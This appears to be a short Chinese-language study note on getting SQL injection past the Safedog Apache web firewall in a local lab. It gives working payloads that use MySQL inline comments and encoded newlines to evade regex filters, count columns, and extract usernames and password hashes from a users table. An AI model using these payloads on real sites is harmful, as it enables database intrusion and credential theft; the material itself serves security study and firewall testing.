最近没事学习一下 waf 的 bypass , 本文介绍下 bypass 安全狗的笔记。个人感觉 bypass 的总思路(正则匹配型 waf)就是利用各种语法特性来逃避正则(当然要保证语法正确性的前提下)
测试环境:
phpstudy + 安全狗Apache版 V4.0、
burp + hackvertor 插件
判断注入
判断字符型注入还是数字型
往数字后面加若干个字母,如果结果不变应该是字符型注入,因为 mysql 的弱类型会把 1xxxx 转换成 1
引入逻辑表达式进行判断
利用 Mysql 支持的 /*!*/ 语法引入 && 绕过过滤
1'/*!&&*/1#'
order by 获取列数
还是利用 /*!*/ 语法来引入关键字, 然后利用 () 包裹数字绕过空格进而绕过正则。
1'/*!&&*/0/*!order*/by(2)#'
所以有 2 列。
绕过 union
%23%0a 绕过正则, 原因大概是 # 是注释符号(只注释一行 \n 截止), waf 认为后面的都是注释不去匹配,而 mysql 支持使用 \n 代替空格,所以绕过了正则。
<@urlencode_1>1'/*!&&*/0/*! union*//*!all*/<@/urlencode_1>%23%0a<@urlencode_2>/*! sElect*/1,@@HOSTNAME#'<@/urlencode_2>
拿密码
使用 %23%0a ,绕过正则
<@urlencode_1>1'/*!&&*/0/*! union*//*!all*/<@/urlencode_1>%23%0a<@urlencode_2>/*! sElect*/user,password <@/urlencode_2>from%23%0a<@urlencode_3>users where user_id=1<@/urlencode_3>%23%27